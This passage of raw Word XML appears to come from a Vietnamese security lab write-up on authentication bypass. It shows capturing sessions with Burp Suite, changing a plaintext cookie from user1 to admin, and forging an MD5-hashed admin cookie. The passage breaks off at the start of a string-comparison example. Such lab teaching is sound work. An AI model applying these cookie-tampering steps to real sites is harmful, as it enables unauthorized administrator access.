        <w:t>pip install requests trên command prompt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F86AF84" w14:textId="1D928DA3" w:rsidR="004653AE" w:rsidRPr="00DD0EB2" w:rsidRDefault="004653AE" w:rsidP="00DD0EB2">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD0EB2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Sau khi đã cài đăt thành công requests.</w:t>
      </w:r>
      <w:r w:rsidR="00DD0EB2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DD0EB2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Sử dụng lệnh </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DD0EB2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>python .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DD0EB2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/example2(example 2 là tên tôi đã cho file lưu trữ đoạn code trên),ta được.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D085024" w14:textId="2803EB60" w:rsidR="004653AE" w:rsidRDefault="00283404" w:rsidP="00DD0EB2">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:pict w14:anchorId="5742035C">
          <v:shape id="Hình ảnh 104" o:spid="_x0000_i1135" type="#_x0000_t75" style="width:402pt;height:225.75pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId125" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F75237" w14:textId="77777777" w:rsidR="004653AE" w:rsidRDefault="004653AE" w:rsidP="004653AE">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Tiến hành đăng nhập với tài khoản là hacker và mật khẩu là p4ssw0rd.Ta được:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7519D95A" w14:textId="59100968"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5F0DF392">
          <v:shape id="Hình ảnh 105" o:spid="_x0000_i1136" type="#_x0000_t75" style="width:292.5pt;height:105.75pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId126" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB43592" w14:textId="77777777" w:rsidR="004653AE" w:rsidRPr="00DD0EB2" w:rsidRDefault="004653AE" w:rsidP="00DD0EB2">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD0EB2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Example 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B782730" w14:textId="10EA6219" w:rsidR="004653AE" w:rsidRPr="00DD0EB2" w:rsidRDefault="004653AE" w:rsidP="00DD0EB2">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD0EB2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Trong ví dụ này ta đăng nhập với tư cách là user1.Mục tiêu là đăng nhập với tư cách là quản trị viên.</w:t>
      </w:r>
      <w:r w:rsidR="00E719D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DD0EB2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Để làm như vậy bạn phải xem xét các phản hồi gửi lại.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B842DBC" w14:textId="5020AF1A" w:rsidR="004653AE" w:rsidRPr="00DD0EB2" w:rsidRDefault="004653AE" w:rsidP="00DD0EB2">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD0EB2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Đầu tiên tôi sử dụng Burpsuite để bắt phiên đăng nhập của website.</w:t>
      </w:r>
      <w:r w:rsidR="00E719D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DD0EB2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Sau khi Repeater&gt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DD0EB2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Go ,ta</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DD0EB2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> thấy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78DB6234" w14:textId="5706DE3F" w:rsidR="004653AE" w:rsidRDefault="00283404" w:rsidP="00DD0EB2">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:pict w14:anchorId="5916B411">
          <v:shape id="Hình ảnh 106" o:spid="_x0000_i1137" type="#_x0000_t75" style="width:468pt;height:263.25pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId127" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="13536E16" w14:textId="3E6C3DE4" w:rsidR="004653AE" w:rsidRPr="00EE7B00" w:rsidRDefault="004653AE" w:rsidP="00EE7B00">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE7B00">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Bạn có thể thấy rằng khi bạn đăng nhập với tư cách là user1 bạn sẽ nhận được cookie là user1.Từ đó bạn có thể dễ dàng sữa đổi giá trị này.</w:t>
      </w:r>
      <w:r w:rsidR="00EE7B00">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE7B00">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Ở đây tôi sử dụng cookie editor để thay đổi value từ user1 thành admin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B30BF3" w14:textId="77777777" w:rsidR="004653AE" w:rsidRPr="00EE7B00" w:rsidRDefault="004653AE" w:rsidP="00EE7B00">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE7B00">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Trên firefox tôi tiến hành cài đặt tiện ích Cookie Editor cho việc hổ trợ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29DE2778" w14:textId="77777777" w:rsidR="004653AE" w:rsidRPr="00EE7B00" w:rsidRDefault="004653AE" w:rsidP="00EE7B00">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE7B00">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Bạn chỉ cần vào phần tiện ích firefox gõ Cookie Editor và tiến hành cài đặt là xong.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A9CF74B" w14:textId="29D502E5" w:rsidR="004653AE" w:rsidRDefault="00283404" w:rsidP="00EE7B00">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:pict w14:anchorId="00F09D73">
          <v:shape id="Hình ảnh 107" o:spid="_x0000_i1138" type="#_x0000_t75" style="width:468pt;height:214.5pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId128" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C7DAC8" w14:textId="0AC210E8" w:rsidR="004653AE" w:rsidRDefault="004653AE" w:rsidP="004653AE">
      <w:pPr>
        <w:pStyle w:val="simple-translate-result"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Sau đó tôi sử dụng nó để sửa đổi giá trị (value=admin),</w:t>
      </w:r>
      <w:r w:rsidR="00E719D1">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>chọn Http only và Save.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4820D8A9" w14:textId="3D3D0A9E" w:rsidR="004653AE" w:rsidRDefault="00283404" w:rsidP="004653AE">
      <w:pPr>
        <w:pStyle w:val="simple-translate-result"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="3BA4D2F0">
          <v:shape id="Hình ảnh 108" o:spid="_x0000_i1139" type="#_x0000_t75" style="width:468pt;height:263.25pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId129" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F24B978" w14:textId="77777777" w:rsidR="004653AE" w:rsidRDefault="004653AE" w:rsidP="004653AE">
      <w:pPr>
        <w:pStyle w:val="simple-translate-result"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Cuối cùng ta đã truy cập thành công vào trang web dưới quyền quản trị viên.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EEBF48E" w14:textId="05F29C0E" w:rsidR="004653AE" w:rsidRDefault="00283404" w:rsidP="004653AE">
      <w:pPr>
        <w:pStyle w:val="simple-translate-result"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="4BE75D49">
          <v:shape id="Hình ảnh 109" o:spid="_x0000_i1140" type="#_x0000_t75" style="width:468pt;height:263.25pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId130" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D11BBC3" w14:textId="5BBC3D06" w:rsidR="004653AE" w:rsidRPr="008E6019" w:rsidRDefault="004653AE" w:rsidP="008E6019">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E6019">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Example 4</w:t>
      </w:r>
      <w:r w:rsidR="000A581F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C5CE8F4" w14:textId="77777777" w:rsidR="004653AE" w:rsidRPr="008E6019" w:rsidRDefault="004653AE" w:rsidP="008E6019">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E6019">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Trong ví dụ này tương tự như ví dụ 3 chỉ khác là cookie đã được mà hóa sang chuẩn MD5.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3361AC90" w14:textId="77777777" w:rsidR="004653AE" w:rsidRPr="008E6019" w:rsidRDefault="004653AE" w:rsidP="008E6019">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E6019">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">MD5 </w:t>
      </w:r>
      <w:r w:rsidRPr="008E6019">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">hay trong kỹ thuật người ta còn gọi là </w:t>
      </w:r>
      <w:r w:rsidRPr="008E6019">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>MD5 Message-Digest Algorithm</w:t>
      </w:r>
      <w:r w:rsidRPr="008E6019">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>, là một hàm băm mã hóa, được sử dụng để kiểm tra tính toàn vẹn của file người dùng tải về trên mạng hoặc copy giữa các thiết bị lưu trữ với nhau</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4525D492" w14:textId="77777777" w:rsidR="004653AE" w:rsidRPr="008E6019" w:rsidRDefault="004653AE" w:rsidP="008E6019">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E6019">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Tiếp theo tôi sử dụng Burpsuite và nhận được cookie có dạng: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5758D116" w14:textId="77777777" w:rsidR="004653AE" w:rsidRPr="008E6019" w:rsidRDefault="004653AE" w:rsidP="008E6019">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E6019">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>user=24c9e15e52afc47c225b757e7bee1f9d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="055A0FFD" w14:textId="4D050D59" w:rsidR="004653AE" w:rsidRDefault="00283404" w:rsidP="008E6019">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:pict w14:anchorId="79C31B8E">
          <v:shape id="Hình ảnh 110" o:spid="_x0000_i1141" type="#_x0000_t75" style="width:468pt;height:200.25pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId131" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B240BF6" w14:textId="3E62815C" w:rsidR="004653AE" w:rsidRDefault="004653AE" w:rsidP="004653AE">
      <w:pPr>
        <w:pStyle w:val="simple-translate-result"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Sau đó tôi đem đoạn cookie lên </w:t>
      </w:r>
      <w:r w:rsidRPr="0062333A">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>md5.gromweb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> để kiểm tra.</w:t>
      </w:r>
      <w:r w:rsidR="00B376D7">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Kết quả:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60EBDF44" w14:textId="4EC3195C" w:rsidR="004653AE" w:rsidRDefault="00283404" w:rsidP="004653AE">
      <w:pPr>
        <w:pStyle w:val="simple-translate-result"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="4DA50524">
          <v:shape id="Hình ảnh 111" o:spid="_x0000_i1142" type="#_x0000_t75" style="width:468pt;height:187.5pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId132" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E11A21" w14:textId="77777777" w:rsidR="004653AE" w:rsidRDefault="004653AE" w:rsidP="004653AE">
      <w:pPr>
        <w:pStyle w:val="simple-translate-result"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Đến đây khi bạn thấy được </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>cookie  trên</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> chính là user1 bạn vừa nhập.Tôi tiến hành Convert </w:t>
      </w:r>
      <w:r w:rsidRPr="0062333A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> sang mã bâm </w:t>
      </w:r>
      <w:r w:rsidRPr="0062333A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>MD5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB44970" w14:textId="1313E78C" w:rsidR="004653AE" w:rsidRDefault="00283404" w:rsidP="004653AE">
      <w:pPr>
        <w:pStyle w:val="simple-translate-result"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="48CD9D2F">
          <v:shape id="Hình ảnh 112" o:spid="_x0000_i1143" type="#_x0000_t75" style="width:468pt;height:114.75pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId133" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="08724BA5" w14:textId="5AAFE5D7" w:rsidR="004653AE" w:rsidRDefault="004653AE" w:rsidP="004653AE">
      <w:pPr>
        <w:pStyle w:val="simple-translate-result"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Tiếp theo ta đem cookie admin vừa convert vào tiện ích Cookie Editor.Tiến hành thay đổi cookie của user1 thành admin.</w:t>
      </w:r>
      <w:r w:rsidR="00B376D7">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Ta được:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23CCB975" w14:textId="6883F93B" w:rsidR="004653AE" w:rsidRDefault="00283404" w:rsidP="004653AE">
      <w:pPr>
        <w:pStyle w:val="simple-translate-result"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="05354AD1">
          <v:shape id="Hình ảnh 113" o:spid="_x0000_i1144" type="#_x0000_t75" style="width:390pt;height:148.5pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId134" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF38009" w14:textId="2A83C863" w:rsidR="004653AE" w:rsidRDefault="00283404" w:rsidP="004653AE">
      <w:pPr>
        <w:pStyle w:val="simple-translate-result"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="169D4599">
          <v:shape id="Hình ảnh 114" o:spid="_x0000_i1145" type="#_x0000_t75" style="width:468pt;height:263.25pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId135" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B83E4DD" w14:textId="77777777" w:rsidR="004653AE" w:rsidRDefault="004653AE" w:rsidP="004653AE">
      <w:pPr>
        <w:pStyle w:val="simple-translate-result"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DEFB50C" w14:textId="4B5397D1" w:rsidR="004653AE" w:rsidRPr="008C14A3" w:rsidRDefault="004653AE" w:rsidP="008C14A3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C14A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Example 5</w:t>
      </w:r>
      <w:r w:rsidR="008C14A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00016122" w14:textId="77777777" w:rsidR="004653AE" w:rsidRPr="008C14A3" w:rsidRDefault="004653AE" w:rsidP="008C14A3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C14A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Ví dụ này cho thấy hệ quả của phương pháp so sánh chuỗi khác nhau. Khi bạn tạo người dùng, ứng dụng sẽ kiểm tra theo chương trình rằng người dùng đó không tồn tại bằng cách so sánh tên người dùng được cung cấp với người dùng hiện có. Khi bạn đăng nhập, ứng dụng sẽ kiểm tra xem tên người dùng và mật khẩu của bạn có chính xác không, sau đó nó sẽ lưu tên người dùng của bạn trong phiên của bạn. Cuối cùng, mỗi khi bạn truy cập ứng dụng, ứng dụng sẽ lấy thông tin chi tiết của người dùng của bạn dựa trên tên người dùng được cung cấp trong phiên.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF80BAD" w14:textId="77777777" w:rsidR="004653AE" w:rsidRPr="008C14A3" w:rsidRDefault="004653AE" w:rsidP="008C14A3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C14A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
